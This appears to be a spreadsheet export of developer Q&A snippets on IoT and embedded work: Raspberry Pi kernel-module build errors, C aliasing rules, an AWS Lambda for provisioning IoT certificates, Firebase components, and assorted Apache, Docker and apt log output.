/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:104:15: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c: In function aiy_gpio_set_impl:
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:121:15: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c: In function aiy_gpio_set:
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:129:2: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:99:18: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c: In function aiy_gpio_direction_output:
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:139:2: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:144:15: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c: In function aiy_io_update_firmware:
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:174:2: error: implicit declaration of function request_firmware_direct [-Werror=implicit-function-declaration]
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c: In function aiy_gpio_probe:
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:163:6: error: struct gpio_chip has no member named parent
/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.c:175:2: error: implicit declaration of function devm_gpiochip_add_data [-Werror=implicit-function-declaration]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:106:4: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c: At top level:
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:304:34: error: array type has incomplete element type
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:305:2: error: field name not in record or union initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:305:2: error: (near initialization for aiy_io_i2c_volatile_ranges)
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:306:3: error: field name not in record or union initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:306:3: error: (near initialization for aiy_io_i2c_volatile_ranges)
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:307:2: error: field name not in record or union initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:307:2: error: (near initialization for aiy_io_i2c_volatile_ranges)
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:308:3: error: field name not in record or union initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:308:3: error: (near initialization for aiy_io_i2c_volatile_ranges)
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:311:21: error: variable aiy_io_i2c_volatile_table has initializer but incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:312:2: error: unknown field yes_ranges specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:312:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:312:2: warning: (near initialization for aiy_io_i2c_volatile_table) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:313:2: error: unknown field n_yes_ranges specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:313:18: error: negative width in bit-field &lt;anonymous&gt;
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:313:18: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:313:18: warning: (near initialization for aiy_io_i2c_volatile_table) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:316:21: error: variable aiy_io_i2c_regmap_config has initializer but incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:317:2: error: unknown field reg_bits specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:317:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:317:2: warning: (near initialization for aiy_io_i2c_regmap_config) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:318:2: error: unknown field val_bits specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:318:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:318:2: warning: (near initialization for aiy_io_i2c_regmap_config) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:319:2: error: unknown field max_register specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:319:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:319:2: warning: (near initialization for aiy_io_i2c_regmap_config) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:320:2: error: unknown field volatile_table specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:320:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:320:2: warning: (near initialization for aiy_io_i2c_regmap_config) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:321:2: error: unknown field cache_type specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:321:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:321:2: warning: (near initialization for aiy_io_i2c_regmap_config) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:322:2: error: unknown field can_multi_write specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:322:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:322:2: warning: (near initialization for aiy_io_i2c_regmap_config) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c: In function aiy_io_i2c_probe:
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:337:2: error: implicit declaration of function devm_regmap_init_i2c [-Werror=implicit-function-declaration]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:337:14: warning: assignment makes pointer from integer without a cast [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:372:29: error: PLATFORM_DEVID_NONE undeclared (first use in this function)
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:372:29: note: each undeclared identifier is reported only once for each function it appears in
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:373:10: warning: passing argument 3 of mfd_add_devices discards const qualifier from pointer target type [enabled by default]
/usr/src/linux-headers-3.6-trunk-common/include/linux/mfd/core.h:100:12: note: expected struct mfd_cell * but argument is of type const struct mfd_cell *
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c: At top level:
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:421:1: warning: data definition has no type or storage class [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:421:1: warning: type defaults to int in declaration of module_i2c_driver [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:421:1: warning: parameter names (without types) in function declaration [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_calculate_16bit_settings:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:134:2: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_pwm_request:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:141:32: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:144:2: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:144:2: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:148:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:150:7: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_pwm_free:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:157:32: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:160:2: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:160:2: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:165:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:168:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_pwm_write_setting:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:184:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:192:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:198:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_pwm_8bit_config:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:212:2: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:219:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:223:39: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:226:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_pwm_16bit_config:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:241:2: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:246:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:250:39: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:252:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:304:34: warning: aiy_io_i2c_volatile_ranges defined but not used [-Wunused-variable]
/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.c:411:26: warning: aiy_io_i2c_driver defined but not used [-Wunused-variable]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_pwm_config:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:263:36: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:267:2: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:270:9: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:288:3: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:292:9: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_pwm_enable:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:305:36: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:310:9: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:311:3: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:314:3: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:320:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_pwm_disable:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:328:36: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:331:2: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:331:2: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:337:15: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:337:54: error: dereferencing pointer to incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: At top level:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:341:21: error: variable aiy_pwm_ops has initializer but incomplete type
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:342:2: error: unknown field request specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:342:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:342:2: warning: (near initialization for aiy_pwm_ops) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:343:2: error: unknown field free specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:343:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:343:2: warning: (near initialization for aiy_pwm_ops) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:344:2: error: unknown field config specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:344:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:344:2: warning: (near initialization for aiy_pwm_ops) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:345:2: error: unknown field enable specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:345:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:345:2: warning: (near initialization for aiy_pwm_ops) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:346:2: error: unknown field disable specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:346:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:346:2: warning: (near initialization for aiy_pwm_ops) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:347:2: error: unknown field owner specified in initializer
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:347:2: warning: excess elements in struct initializer [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:347:2: warning: (near initialization for aiy_pwm_ops) [enabled by default]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_pwm_probe:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:366:2: error: implicit declaration of function pwmchip_add [-Werror=implicit-function-declaration]
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c: In function aiy_pwm_remove:
/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.c:380:2: error: implicit declaration of function pwmchip_remove [-Werror=implicit-function-declaration]
cc1: some warnings being treated as errors
cc1: some warnings being treated as errors
cc1: some warnings being treated as errors
/usr/src/linux-headers-3.6-trunk-common/scripts/Makefile.build:313: recipe for target '/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.o' failed
make[5]: *** [/var/lib/dkms/aiy/1.1/build/aiy/gpio/gpio-aiy-io.o] Error 1
/usr/src/linux-headers-3.6-trunk-common/scripts/Makefile.build:443: recipe for target '/var/lib/dkms/aiy/1.1/build/aiy/gpio' failed
make[4]: *** [/var/lib/dkms/aiy/1.1/build/aiy/gpio] Error 2
/usr/src/linux-headers-3.6-trunk-common/scripts/Makefile.build:313: recipe for target '/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.o' failed
make[5]: *** [/var/lib/dkms/aiy/1.1/build/aiy/mfd/aiy-io-i2c.o] Error 1
/usr/src/linux-headers-3.6-trunk-common/scripts/Makefile.build:443: recipe for target '/var/lib/dkms/aiy/1.1/build/aiy/mfd' failed
make[4]: *** [/var/lib/dkms/aiy/1.1/build/aiy/mfd] Error 2
/usr/src/linux-headers-3.6-trunk-common/scripts/Makefile.build:313: recipe for target '/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.o' failed
make[5]: *** [/var/lib/dkms/aiy/1.1/build/aiy/pwm/pwm-aiy-io.o] Error 1
/usr/src/linux-headers-3.6-trunk-common/scripts/Makefile.build:443: recipe for target '/var/lib/dkms/aiy/1.1/build/aiy/pwm' failed
make[4]: *** [/var/lib/dkms/aiy/1.1/build/aiy/pwm] Error 2
/usr/src/linux-headers-3.6-trunk-common/scripts/Makefile.build:443: recipe for target '/var/lib/dkms/aiy/1.1/build/aiy' failed
make[3]: *** [/var/lib/dkms/aiy/1.1/build/aiy] Error 2
/usr/src/linux-headers-3.6-trunk-common/Makefile:1208: recipe for target '_module_/var/lib/dkms/aiy/1.1/build' failed
make[2]: *** [_module_/var/lib/dkms/aiy/1.1/build] Error 2
Makefile:130: recipe for target 'sub-make' failed
make[1]: *** [sub-make] Error 2
Makefile:8: recipe for target 'all' failed
make: *** [all] Error 2
make: Leaving directory '/usr/src/linux-headers-3.6-trunk-rpi'
Below is /var/lib/dkms/aiy-vision/1.1/build/make.log :
DKMS make.log for aiy-vision-1.1 for kernel 3.6-trunk-rpi (armv7l)
Wed 30 Jan 22:03:35 CET 2019
make: Entering directory '/usr/src/linux-headers-3.6-trunk-rpi'
  LD      /var/lib/dkms/aiy-vision/1.1/build/built-in.o
  CC [M]  /var/lib/dkms/aiy-vision/1.1/build/aiy-vision.o
/var/lib/dkms/aiy-vision/1.1/build/aiy-vision.c:32:33: fatal error: linux/gpio/consumer.h: No such file or directory
compilation terminated.</t>
  </si>
  <si>
    <t>Framework/SDK-based Security</t>
  </si>
  <si>
    <t>drivers/hmc5883l.c: In function magInit:
drivers/hmc5883l.c:7:30: error: MAG_ADDR undeclared (first use in this function)
drivers/hmc5883l.c:7:30: note: each undeclared identifier is reported only once for each function it appears in
drivers/hmc5883l.c:14:17: error: MODE undeclared (first use in this function)
drivers/hmc5883l.c:14:23: error: CONTINUOUS undeclared (first use in this function)
drivers/hmc5883l.c:22:17: error: CONA undeclared (first use in this function)
drivers/hmc5883l.c:22:23: error: RATE_50HZ undeclared (first use in this function)
drivers/hmc5883l.c: In function magRead:
drivers/hmc5883l.c:37:30: error: MAG_ADDR undeclared (first use in this function)
drivers/hmc5883l.c:38:18: error: DATA undeclared (first use in this function)
drivers/hmc5883l.c: In function magGetRegister:
drivers/hmc5883l.c:60:13: error: BCM2835_I2C_REASON_OK undeclared (first use in this function)
drivers/hmc5883l.c:61:3: warning: incompatible implicit declaration of built-in function printf [enabled by default]
drivers/hmc5883l.c: At top level:
drivers/hmc5883l.c:71:6: warning: conflicting types for magGetRegisters [enabled by default]
drivers/hmc5883l.c:38:2: note: previous implicit declaration of magGetRegisters was here
drivers/hmc5883l.c: In function magGetRegisters:
drivers/hmc5883l.c:79:13: error: BCM2835_I2C_REASON_OK undeclared (first use in this function)
drivers/hmc5883l.c:80:3: warning: incompatible implicit declaration of built-in function printf [enabled by default]
drivers/hmc5883l.c: At top level:
drivers/hmc5883l.c:97:6: warning: conflicting types for magSetRegister [enabled by default]
drivers/hmc5883l.c:14:2: note: previous implicit declaration of magSetRegister was here
drivers/hmc5883l.c: In function magSetRegister:
drivers/hmc5883l.c:107:13: error: BCM2835_I2C_REASON_OK undeclared (first use in this function)
drivers/hmc5883l.c:108:3: warning: incompatible implicit declaration of built-in function printf [enabled by default]
drivers/gy-85.c: In function gyInit:
drivers/gy-85.c:15:30: error: BCM2835_I2C_CLOCK_DIVIDER_2500 undeclared (first use in this function)
drivers/gy-85.c:15:30: note: each undeclared identifier is reported only once for each function it appears in
drivers/gy-85.c: In function gyUpdate:
drivers/gy-85.c:29:2: error: unknown type name int16_t
drivers/gy-85.c:30:2: error: unknown type name uint8_t
drivers/gy-85.c:32:9: error: int16_t undeclared (first use in this function)
drivers/gy-85.c:32:18: error: expected expression before ) token
drivers/gy-85.c:40:18: error: expected expression before ) token
drivers/gy-85.c:47:18: error: expected expression before ) token
drivers/gy-85.c:61:2: warning: return from incompatible pointer type [enabled by default]
In file included from drivers/nrf24l01.c:1:0:
drivers/nrf24l01.h:5:21: fatal error: bcm2835.h: No such file or directory
compilation terminated.</t>
  </si>
  <si>
    <t>If a program attempts to access the stored value of an object through
  a glvalue of other than one of the following types the behavior is
  undefined:
   the dynamic type of the object,
   a cv-qualified version of the dynamic type of the object,
   a type similar (as defined in 4.4) to the dynamic type of the object,
   a type that is the signed or unsigned type corresponding to the dynamic type of the object,
   a type that is the signed or unsigned type corresponding to a cv-qualified version of the dynamic type of the object,
   an aggregate or union type that includes one of the aforementioned types  among its elements or nonstatic data members (including, recursively, an element or non-static data member of a subaggregate or contained union),
   a type that is a (possibly cv-qualified) base class type of the dynamic type of the object,
   a char or unsigned char type.</t>
  </si>
  <si>
    <t>The aliasing rules are described in the following sections in the standards:
C11 6.5 7
An object shall have its stored value accessed only by an lvalue
  expression that has one of the following types:
   a type compatible
  with the effective type of the object,
   a qualified version of a type
  compatible with the effective type of the object,
   a type that is the
  signed or unsigned type corresponding to the effective type of the
  object,
   a type that is the signed or unsigned type corresponding to
  a qualified version of the effective type of the object,
   an aggregate or union type that includes one of the aforementioned types
  among its members (including, recursively, a member of a subaggregate
  or contained union), or
   a character type.</t>
  </si>
  <si>
    <t>If you dont have a mass production devices i recommend to use SDK and Lambda to do this, the lambda code is something like this:
var AWS = require('aws-sdk');
exports.handler = function(event, context, callback) {
const region = "us-east-1";
const accountId = &lt; YOUR ACCOUNT ID &gt; ;
const BUCKET = &lt; YOUR BUCKET &gt; ;
var certificateARN;
var iot = new AWS.Iot({
    'region': region,
    apiVersion: '2015-05-28'
});
event.data.id = getId();
iot.createKeysAndCertificate({
    setAsActive: true
}, function(err, data) {
    if (err) callback(err, null);
    else {
        certificateARN = `arn:aws:iot:${region}:${accountId}:cert/${data.certificateId}`;
        uploadCertificatesToS3(event.data.id, data);
        iot.attachPrincipalPolicy({
            policyName: &lt; YOUR IOT POLICY NAME &gt; ,
            principal: certificateARN
        }, (err, data) =&gt; {
            if (err) callback(err, data);
            else {
                var thingName = event.data.id;
                iot.createThing({
                    thingName: thingName,
                    attributePayload: {
                        attributes: {},
                        merge: false
                    }
                }, function(err, data) {
                    if (err) callback(err, null);
                    else {
                        iot.attachThingPrincipal({
                            principal: certificateARN,
                            thingName: thingName
                        }, function(err, data) {
                            if (err) callback(err, null);
                            else callback(null, event.data);
                        });
                    }
                });
            }
        });
    }
});
function getId() {
    return Math.trunc(new Date().getTime() / 1000) + '-' + Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1);
}
function uploadCertificatesToS3(deviceId, certsData) {
    return Promise.all([
        new Promise(function(resolve, reject) {
            var base64data = new Buffer(certsData.certificatePem, 'binary');
            var s3 = new AWS.S3();
            s3.putObject({
                Bucket: BUCKET,
                Key: `${event.data.project}/devices-certificates/${deviceId}/${deviceId}.crt`,
                Body: base64data
            }, function(err, data) {
                if (err) console.log("Error S3", deviceId);
            });
        }),
        new Promise(function(resolve, reject) {
            var base64data = new Buffer(certsData.keyPair.PrivateKey, 'binary');
            var s3 = new AWS.S3();
            s3.putObject({
                Bucket: BUCKET,
                Key: `${event.data.project}/devices-certificates/${deviceId}/${deviceId}.key`,
                Body: base64data
            }, function(err, data) {
                if (err) console.log("Error S3", deviceId);
            });
        }),
        new Promise(function(resolve, reject) {
            var base64data = new Buffer(certsData.keyPair.PublicKey, 'binary');
            var s3 = new AWS.S3();
            s3.putObject({
                Bucket: BUCKET,
                Key: `${event.data.project}/devices-certificates/${deviceId}/${deviceId}.public.key`,
                Body: base64data
            }, function(err, data) {
                if (err) console.log("Error S3", deviceId);
            });
        })
    ]);
}
}
This will create the certs using the AWS rootCA, save them in s3, create the thing, attach policy to certs and attach certs to the thing, all in just one lambda function.</t>
  </si>
  <si>
    <t>Firebase is composed of the following components:
Google Analytics for Firebase (firebase-analytics)
Firebase App Indexing (firebase-app-indexing)
Firebase Authentication (firebase-authentication)
Cloud Functions for Firebase (google-cloud-functions)
Firebase Cloud Messaging (firebase-cloud-messaging)
Firebase Crash Reporting (firebase-crash-reporting)
Firebase Dynamic Links (firebase-dynamic-links)
Firebase Hosting (firebase-hosting)
Firebase Invites (firebase-invites)
Firebase Notifications (firebase-notifications)
Firebase Realtime Database (firebase-database)
Cloud Firestore for Firebase (google-cloud-firestore)
Firebase Remote Config (firebase-remote-config)
Cloud Storage for Firebase (firebase-storage)
Firebase Test Lab (firebase-test-lab)
Firebase Performance Monitoring (firebase-performance)
AdMob by Google (admob)
Google AdWords (adwords)
Firebase Predictions (firebase-predictions)
Firebase Crashlytics (crashlytics)
ML Kit for Firebase (firebase-mlkit)
Firebase In-App Messaging (firebase-in-app-messaging)
Firebase A/B Testing(firebase-ab-testing)
Resources
Firebase Status Dashboard
Twitter: @Firebase #Firebase
YouTube Channel: youtube.com/firebase
The Firebase Blog
Firebase Codelabs</t>
  </si>
  <si>
    <t>ANOTHER EDIT: Looking at the original posters access.log it seems that there might have been a permissions issue directly connected to an .htaccess:
[Sun May 04 17:46:10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17:46:12 2014] [crit] [client 192.168.1.2] (13)Permission denied: /var/www/js/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable
[Sun May 04 17:46:12 2014] [crit] [client 192.168.1.2] (13)Permission denied: /var/www/js/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable
[Sun May 04 17:46:12 2014] [crit] [client 192.168.1.2] (13)Permission denied: /var/www/js/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable
So while doing a blanket permissions change on /var/www/ solved the issue, perhaps the permissions issue was based in /var/www/js/.htaccess or even the parent /var/www/js/ directory as well?</t>
  </si>
  <si>
    <t>Printing the output from the verification:
OS: Linux
KERNEL_VERSION: 4.4.50-hypriotos-v7+
CONFIG_NAMESPACES: enabled
CONFIG_NET_NS: enabled
CONFIG_PID_NS: enabled
CONFIG_IPC_NS: enabled
CONFIG_UTS_NS: enabled
CONFIG_CGROUPS: enabled
CONFIG_CGROUP_CPUACCT: enabled
CONFIG_CGROUP_DEVICE: enabled
CONFIG_CGROUP_FREEZER: enabled
CONFIG_CGROUP_SCHED: enabled
CONFIG_CPUSETS: enabled
CONFIG_MEMCG: enabled
CONFIG_INET: enabled
CONFIG_EXT4_FS: enabled
CONFIG_PROC_FS: enabled
CONFIG_NETFILTER_XT_TARGET_REDIRECT: enabled (as module)
CONFIG_NETFILTER_XT_MATCH_COMMENT: enabled (as module)
CONFIG_OVERLAY_FS: enabled (as module)
CONFIG_AUFS_FS: not set - Required for aufs.</t>
  </si>
  <si>
    <t>DeviceClient {
  publish: [Function],
  subscribe: [Function],
  unsubscribe: [Function],
  end: [Function],
  handleMessage: [Function: bound ],
  updateWebSocketCredentials: [Function],
  getWebsocketHeaders: [Function],
  updateCustomAuthHeaders: [Function],
  simulateNetworkFailure: [Function],
  _events: 
   { connect: [Function],
     close: [Function],
     reconnect: [Function],
     offline: [Function],
     error: [Function],
     message: [Function] },
  _eventsCount: 6,
  connected: true }</t>
  </si>
  <si>
    <t>W: Unable to read /etc/apt/apt.conf.d/ - DirectoryExists (2: No such file or directory)
W: Unable to read /etc/apt/sources.list.d/ - DirectoryExists (2: No such file or directory)
W: Unable to read /etc/apt/sources.list - RealFileExists (2: No such file or directory)
E: Could not open lock file /var/lib/dpkg/lock - open (2: No such file or directory)
E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?</t>
  </si>
  <si>
    <t>allow_intrusive_scan = false
# Set log level (default: error)
